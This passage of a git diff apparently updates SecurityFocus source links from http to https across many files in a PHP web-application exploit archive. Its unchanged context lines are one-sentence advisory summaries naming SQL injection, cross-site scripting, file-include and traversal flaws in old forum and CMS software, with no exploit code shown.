@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14601/info +source: https://www.securityfocus.com/bid/14601/info Zorum is prone to an arbitrary command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26172.txt b/exploits/php/webapps/26172.txt index 2f2e1c7a8..2147a4aa9 100644 --- a/exploits/php/webapps/26172.txt +++ b/exploits/php/webapps/26172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14604/info +source: https://www.securityfocus.com/bid/14604/info Mantis is prone to multiple input validation vulnerabilities. These issues involve cross-site scripting, HTML injection and variable poisoning, and are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26176.txt b/exploits/php/webapps/26176.txt index e4e5a16d4..7dbacc50d 100644 --- a/exploits/php/webapps/26176.txt +++ b/exploits/php/webapps/26176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14617/info +source: https://www.securityfocus.com/bid/14617/info Woltlab Burning Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26177.txt b/exploits/php/webapps/26177.txt index 7eb939e7e..68d3eafd8 100644 --- a/exploits/php/webapps/26177.txt +++ b/exploits/php/webapps/26177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26178.txt b/exploits/php/webapps/26178.txt index e4d78268d..d6f843b7c 100644 --- a/exploits/php/webapps/26178.txt +++ b/exploits/php/webapps/26178.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26179.txt b/exploits/php/webapps/26179.txt index deae52ff2..607e38ac0 100644 --- a/exploits/php/webapps/26179.txt +++ b/exploits/php/webapps/26179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26180.txt b/exploits/php/webapps/26180.txt index b881d1fe2..e471768b9 100644 --- a/exploits/php/webapps/26180.txt +++ b/exploits/php/webapps/26180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14618/info +source: https://www.securityfocus.com/bid/14618/info Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26181.txt b/exploits/php/webapps/26181.txt index dd0c2d17b..a0da210b9 100644 --- a/exploits/php/webapps/26181.txt +++ b/exploits/php/webapps/26181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14619/info +source: https://www.securityfocus.com/bid/14619/info Land Down Under is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26182.txt b/exploits/php/webapps/26182.txt index fd553ad8b..07e97723e 100644 --- a/exploits/php/webapps/26182.txt +++ b/exploits/php/webapps/26182.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14619/info +source: https://www.securityfocus.com/bid/14619/info Land Down Under is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26183.txt b/exploits/php/webapps/26183.txt index fd9cea342..6c791e7d7 100644 --- a/exploits/php/webapps/26183.txt +++ b/exploits/php/webapps/26183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14626/info +source: https://www.securityfocus.com/bid/14626/info nePHP is prone to a cross-site scripting vulnerability. This issue is due to a lack of sanitization of user-supplied input. diff --git a/exploits/php/webapps/26184.txt b/exploits/php/webapps/26184.txt index cd4b92438..080d1c1ad 100644 --- a/exploits/php/webapps/26184.txt +++ b/exploits/php/webapps/26184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14629/info +source: https://www.securityfocus.com/bid/14629/info PHPKit is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26186.txt b/exploits/php/webapps/26186.txt index 19ebd4cee..72acec2a8 100644 --- a/exploits/php/webapps/26186.txt +++ b/exploits/php/webapps/26186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14631/info +source: https://www.securityfocus.com/bid/14631/info RunCMS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26187.txt b/exploits/php/webapps/26187.txt index a05509680..36bbe2365 100644 --- a/exploits/php/webapps/26187.txt +++ b/exploits/php/webapps/26187.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14635/info +source: https://www.securityfocus.com/bid/14635/info PostNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26188.txt b/exploits/php/webapps/26188.txt index 4e1a8549d..7e11c7687 100644 --- a/exploits/php/webapps/26188.txt +++ b/exploits/php/webapps/26188.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14635/info +source: https://www.securityfocus.com/bid/14635/info PostNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26189.txt b/exploits/php/webapps/26189.txt index 8ba90c34a..bea178c2f 100644 --- a/exploits/php/webapps/26189.txt +++ b/exploits/php/webapps/26189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14636/info +source: https://www.securityfocus.com/bid/14636/info PostNuke is prone to an SQL injection vulnerability. This issue is due to a lack of sufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/26190.txt b/exploits/php/webapps/26190.txt index ca747b605..55af7477a 100644 --- a/exploits/php/webapps/26190.txt +++ b/exploits/php/webapps/26190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14639/info +source: https://www.securityfocus.com/bid/14639/info SaveWebPortal is prone to an unauthorized access vulnerability. This issue is due to a failure in the application to limit access to administrative scripts. diff --git a/exploits/php/webapps/26191.txt b/exploits/php/webapps/26191.txt index ceafed378..deb237c01 100644 --- a/exploits/php/webapps/26191.txt +++ b/exploits/php/webapps/26191.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14641/info +source: https://www.securityfocus.com/bid/14641/info SaveWebPortal is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26192.txt b/exploits/php/webapps/26192.txt index ba609591f..472ea0809 100644 --- a/exploits/php/webapps/26192.txt +++ b/exploits/php/webapps/26192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14642/info +source: https://www.securityfocus.com/bid/14642/info SaveWebPortal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26193.txt b/exploits/php/webapps/26193.txt index e611de7b6..87452d1d2 100644 --- a/exploits/php/webapps/26193.txt +++ b/exploits/php/webapps/26193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14643/info +source: https://www.securityfocus.com/bid/14643/info SaveWebPortal is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26197.txt b/exploits/php/webapps/26197.txt index 2ece52cc4..35460abba 100644 --- a/exploits/php/webapps/26197.txt +++ b/exploits/php/webapps/26197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14658/info +source: https://www.securityfocus.com/bid/14658/info Foojan PHPWeblog is prone to an HTML injection vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26199.txt b/exploits/php/webapps/26199.txt index 889b3ac7b..5fa12be0e 100644 --- a/exploits/php/webapps/26199.txt +++ b/exploits/php/webapps/26199.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14675/info +source: https://www.securityfocus.com/bid/14675/info phpMyAdmin is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/26200.txt b/exploits/php/webapps/26200.txt index b19c36266..b0b67844e 100644 --- a/exploits/php/webapps/26200.txt +++ b/exploits/php/webapps/26200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14676/info +source: https://www.securityfocus.com/bid/14676/info SqWebMail is affected by a vulnerability that may allow remote attackers to inject and execute arbitrary script code in a user's browser. diff --git a/exploits/php/webapps/26201.txt b/exploits/php/webapps/26201.txt index 2483965a5..2bcb56eb2 100644 --- a/exploits/php/webapps/26201.txt +++ b/exploits/php/webapps/26201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14679/info +source: https://www.securityfocus.com/bid/14679/info phpWebNotes is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/26202.txt b/exploits/php/webapps/26202.txt index f7101858f..20a049cb4 100644 --- a/exploits/php/webapps/26202.txt +++ b/exploits/php/webapps/26202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14680/info +source: https://www.securityfocus.com/bid/14680/info Looking Glass is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/26203.php b/exploits/php/webapps/26203.php index 78c52e023..1468bce5e 100644 --- a/exploits/php/webapps/26203.php +++ b/exploits/php/webapps/26203.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14682/info +source: https://www.securityfocus.com/bid/14682/info Looking Glass may be exploited to execute arbitrary commands. diff --git a/exploits/php/webapps/26204.pl b/exploits/php/webapps/26204.pl index db953ef75..a4001fd9b 100755 --- a/exploits/php/webapps/26204.pl +++ b/exploits/php/webapps/26204.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14684/info +source: https://www.securityfocus.com/bid/14684/info MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26205.txt b/exploits/php/webapps/26205.txt index db2f270a0..60e9c99b7 100644 --- a/exploits/php/webapps/26205.txt +++ b/exploits/php/webapps/26205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14685/info +source: https://www.securityfocus.com/bid/14685/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26206.txt b/exploits/php/webapps/26206.txt index 2a6da8f00..d579a0afe 100644 --- a/exploits/php/webapps/26206.txt +++ b/exploits/php/webapps/26206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14685/info +source: https://www.securityfocus.com/bid/14685/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26207.txt b/exploits/php/webapps/26207.txt index 8db45b16f..0804ecc20 100644 --- a/exploits/php/webapps/26207.txt +++ b/exploits/php/webapps/26207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14685/info +source: https://www.securityfocus.com/bid/14685/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26208.txt b/exploits/php/webapps/26208.txt index 0790fef83..9fd6abb3c 100644 --- a/exploits/php/webapps/26208.txt +++ b/exploits/php/webapps/26208.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14686/info +source: https://www.securityfocus.com/bid/14686/info AutoLinks Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26209.txt b/exploits/php/webapps/26209.txt index 84753f4bc..9fe9201c2 100644 --- a/exploits/php/webapps/26209.txt +++ b/exploits/php/webapps/26209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14688/info +source: https://www.securityfocus.com/bid/14688/info PHP-Fusion is prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26211.txt b/exploits/php/webapps/26211.txt index ec3acc5f3..eaea309ee 100644 --- a/exploits/php/webapps/26211.txt +++ b/exploits/php/webapps/26211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14695/info +source: https://www.securityfocus.com/bid/14695/info phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26212.txt b/exploits/php/webapps/26212.txt index 7cea3b75d..01d54678e 100644 --- a/exploits/php/webapps/26212.txt +++ b/exploits/php/webapps/26212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14702/info +source: https://www.securityfocus.com/bid/14702/info FlatNuke is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26215.txt b/exploits/php/webapps/26215.txt index 02c648032..cf177b39c 100644 --- a/exploits/php/webapps/26215.txt +++ b/exploits/php/webapps/26215.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14704/info +source: https://www.securityfocus.com/bid/14704/info FlatNuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26217.html b/exploits/php/webapps/26217.html index 7e1b23d0f..5b9985f7c 100644 --- a/exploits/php/webapps/26217.html +++ b/exploits/php/webapps/26217.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14709/info +source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26223.txt b/exploits/php/webapps/26223.txt index b4957acd8..922c5e2e4 100644 --- a/exploits/php/webapps/26223.txt +++ b/exploits/php/webapps/26223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14746/info +source: https://www.securityfocus.com/bid/14746/info Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26224.txt b/exploits/php/webapps/26224.txt index d0273b1c0..6cb183cc0 100644 --- a/exploits/php/webapps/26224.txt +++ b/exploits/php/webapps/26224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14748/info +source: https://www.securityfocus.com/bid/14748/info Unclassified NewsBoard is prone to an HTML injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26225.txt b/exploits/php/webapps/26225.txt index cf693d36b..53941f154 100644 --- a/exploits/php/webapps/26225.txt +++ b/exploits/php/webapps/26225.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14750/info +source: https://www.securityfocus.com/bid/14750/info MAXdev MD-Pro is prone to an arbitrary remote file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26226.txt b/exploits/php/webapps/26226.txt index 16934f12c..fd098df68 100644 --- a/exploits/php/webapps/26226.txt +++ b/exploits/php/webapps/26226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14751/info +source: https://www.securityfocus.com/bid/14751/info MAXdev MD-Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26228.txt b/exploits/php/webapps/26228.txt index b6cf651eb..dd4240345 100644 --- a/exploits/php/webapps/26228.txt +++ b/exploits/php/webapps/26228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14762/info +source: https://www.securityfocus.com/bid/14762/info MyBulletinBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26229.txt b/exploits/php/webapps/26229.txt index 734bd779b..0f623a737 100644 --- a/exploits/php/webapps/26229.txt +++ b/exploits/php/webapps/26229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14763/info +source: https://www.securityfocus.com/bid/14763/info phpCommunityCalendar is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before being used in SQL queries. diff --git a/exploits/php/webapps/26231.txt b/exploits/php/webapps/26231.txt index 63bcf95cb..15d31bdc5 100644 --- a/exploits/php/webapps/26231.txt +++ b/exploits/php/webapps/26231.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14765/info +source: https://www.securityfocus.com/bid/14765/info PBLang is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26232.txt b/exploits/php/webapps/26232.txt index 7618297d3..dc8955224 100644 --- a/exploits/php/webapps/26232.txt +++ b/exploits/php/webapps/26232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14767/info +source: https://www.securityfocus.com/bid/14767/info phpCommunityCalendar is prone to multiple remote cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26234.txt b/exploits/php/webapps/26234.txt index bfaf9b905..92cb1968e 100644 --- a/exploits/php/webapps/26234.txt +++ b/exploits/php/webapps/26234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14776/info +source: https://www.securityfocus.com/bid/14776/info WEB//NEWS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26235.txt b/exploits/php/webapps/26235.txt index 5e2d7548e..bed3ec1aa 100644 --- a/exploits/php/webapps/26235.txt +++ b/exploits/php/webapps/26235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14776/info +source: https://www.securityfocus.com/bid/14776/info WEB//NEWS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26236.txt b/exploits/php/webapps/26236.txt index c6c83231b..80b56cee4 100644 --- a/exploits/php/webapps/26236.txt +++ b/exploits/php/webapps/26236.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14776/info +source: https://www.securityfocus.com/bid/14776/info WEB//NEWS is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26237.txt b/exploits/php/webapps/26237.txt index 1d22274bf..95cc951c5 100644 --- a/exploits/php/webapps/26237.txt +++ b/exploits/php/webapps/26237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14777/info +source: https://www.securityfocus.com/bid/14777/info aMember is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/26247.txt b/exploits/php/webapps/26247.txt index 9516aeb72..11524d179 100644 --- a/exploits/php/webapps/26247.txt +++ b/exploits/php/webapps/26247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14786/info +source: https://www.securityfocus.com/bid/14786/info MyBulletinBoard is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26252.txt b/exploits/php/webapps/26252.txt index f9962aadc..54bd8e6fb 100644 --- a/exploits/php/webapps/26252.txt +++ b/exploits/php/webapps/26252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14817/info +source: https://www.securityfocus.com/bid/14817/info Subscribe Me Pro is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26253.txt b/exploits/php/webapps/26253.txt index 8ec9960b3..dfee58b53 100644 --- a/exploits/php/webapps/26253.txt +++ b/exploits/php/webapps/26253.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14820/info +source: https://www.securityfocus.com/bid/14820/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26254.txt b/exploits/php/webapps/26254.txt index 5d8279cc3..f02a5b2ed 100644 --- a/exploits/php/webapps/26254.txt +++ b/exploits/php/webapps/26254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14820/info +source: https://www.securityfocus.com/bid/14820/info Land Down Under is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26255.php b/exploits/php/webapps/26255.php index e7b234fef..c77d34d5b 100644 --- a/exploits/php/webapps/26255.php +++ b/exploits/php/webapps/26255.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14821/info +source: https://www.securityfocus.com/bid/14821/info Mail-it Now! Upload2Server is prone to an arbitrary file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before uploading files. diff --git a/exploits/php/webapps/26257.txt b/exploits/php/webapps/26257.txt index 5476b0b6f..f8a366446 100644 --- a/exploits/php/webapps/26257.txt +++ b/exploits/php/webapps/26257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14831/info +source: https://www.securityfocus.com/bid/14831/info ATutor is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26258.txt b/exploits/php/webapps/26258.txt index 8b7c2a590..006f1fa7f 100644 --- a/exploits/php/webapps/26258.txt +++ b/exploits/php/webapps/26258.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14832/info +source: https://www.securityfocus.com/bid/14832/info ATutor is prone to a remote information disclosure vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged information. diff --git a/exploits/php/webapps/26259.txt b/exploits/php/webapps/26259.txt index cd5fdd57d..58f541b57 100644 --- a/exploits/php/webapps/26259.txt +++ b/exploits/php/webapps/26259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14833/info +source: https://www.securityfocus.com/bid/14833/info Noah's Classifieds is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26260.txt b/exploits/php/webapps/26260.txt index 0cdc157cf..650aa246d 100644 --- a/exploits/php/webapps/26260.txt +++ b/exploits/php/webapps/26260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14834/info +source: https://www.securityfocus.com/bid/14834/info A remote command execution vulnerability affects the application. diff --git a/exploits/php/webapps/26261.txt b/exploits/php/webapps/26261.txt index 286e83fa5..a2ce9c79b 100644 --- a/exploits/php/webapps/26261.txt +++ b/exploits/php/webapps/26261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14835/info +source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26262.txt b/exploits/php/webapps/26262.txt index 3841dec31..ceee253df 100644 --- a/exploits/php/webapps/26262.txt +++ b/exploits/php/webapps/26262.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14843/info +source: https://www.securityfocus.com/bid/14843/info Digital Scribe is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26263.txt b/exploits/php/webapps/26263.txt index 2c1aa0bf0..aeb2c4dcb 100644 --- a/exploits/php/webapps/26263.txt +++ b/exploits/php/webapps/26263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14847/info +source: https://www.securityfocus.com/bid/14847/info AEwebworks aeDating is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before it is used in an SQL query. diff --git a/exploits/php/webapps/26264.txt b/exploits/php/webapps/26264.txt index aaceb1f27..f453ed8e0 100644 --- a/exploits/php/webapps/26264.txt +++ b/exploits/php/webapps/26264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26265.txt b/exploits/php/webapps/26265.txt index 55662b97b..afe4ff94b 100644 --- a/exploits/php/webapps/26265.txt +++ b/exploits/php/webapps/26265.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26266.txt b/exploits/php/webapps/26266.txt index 88c895a90..061e92c9b 100644 --- a/exploits/php/webapps/26266.txt +++ b/exploits/php/webapps/26266.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26267.txt b/exploits/php/webapps/26267.txt index 53b0d55dd..ad452d6f1 100644 --- a/exploits/php/webapps/26267.txt +++ b/exploits/php/webapps/26267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26268.txt b/exploits/php/webapps/26268.txt index 8212321bf..66fae2a0d 100644 --- a/exploits/php/webapps/26268.txt +++ b/exploits/php/webapps/26268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14851/info +source: https://www.securityfocus.com/bid/14851/info DeluxeBB is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being sent to SQL queries. diff --git a/exploits/php/webapps/26270.txt b/exploits/php/webapps/26270.txt index e2ae01108..15f6abb3f 100644 --- a/exploits/php/webapps/26270.txt +++ b/exploits/php/webapps/26270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14862/info +source: https://www.securityfocus.com/bid/14862/info Content2Web is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26272.txt b/exploits/php/webapps/26272.txt index b704724a9..f0b5ea845 100644 --- a/exploits/php/webapps/26272.txt +++ b/exploits/php/webapps/26272.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14871/info +source: https://www.securityfocus.com/bid/14871/info EPay Pro is prone to a directory traversal vulnerability. This is due to a lack of proper validation of user-supplied input. diff --git a/exploits/php/webapps/26273.txt b/exploits/php/webapps/26273.txt index 23592486e..aad08ccfa 100644 --- a/exploits/php/webapps/26273.txt +++ b/exploits/php/webapps/26273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26274.txt b/exploits/php/webapps/26274.txt index c2c31b044..d472e6677 100644 --- a/exploits/php/webapps/26274.txt +++ b/exploits/php/webapps/26274.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26275.txt b/exploits/php/webapps/26275.txt index e70ce50c1..3b8c57a91 100644 --- a/exploits/php/webapps/26275.txt +++ b/exploits/php/webapps/26275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26276.txt b/exploits/php/webapps/26276.txt index fb27236f1..da55afde7 100644 --- a/exploits/php/webapps/26276.txt +++ b/exploits/php/webapps/26276.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14872/info +source: https://www.securityfocus.com/bid/14872/info vBulletin is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26277.txt b/exploits/php/webapps/26277.txt index b5dbe9747..f557e4090 100644 --- a/exploits/php/webapps/26277.txt +++ b/exploits/php/webapps/26277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14873/info +source: https://www.securityfocus.com/bid/14873/info NooToplist is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26278.txt b/exploits/php/webapps/26278.txt index 8fffa59d7..14d710689 100644 --- a/exploits/php/webapps/26278.txt +++ b/exploits/php/webapps/26278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14874/info +source: https://www.securityfocus.com/bid/14874/info vBulletin is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26279.txt b/exploits/php/webapps/26279.txt index 38e796035..128faae96 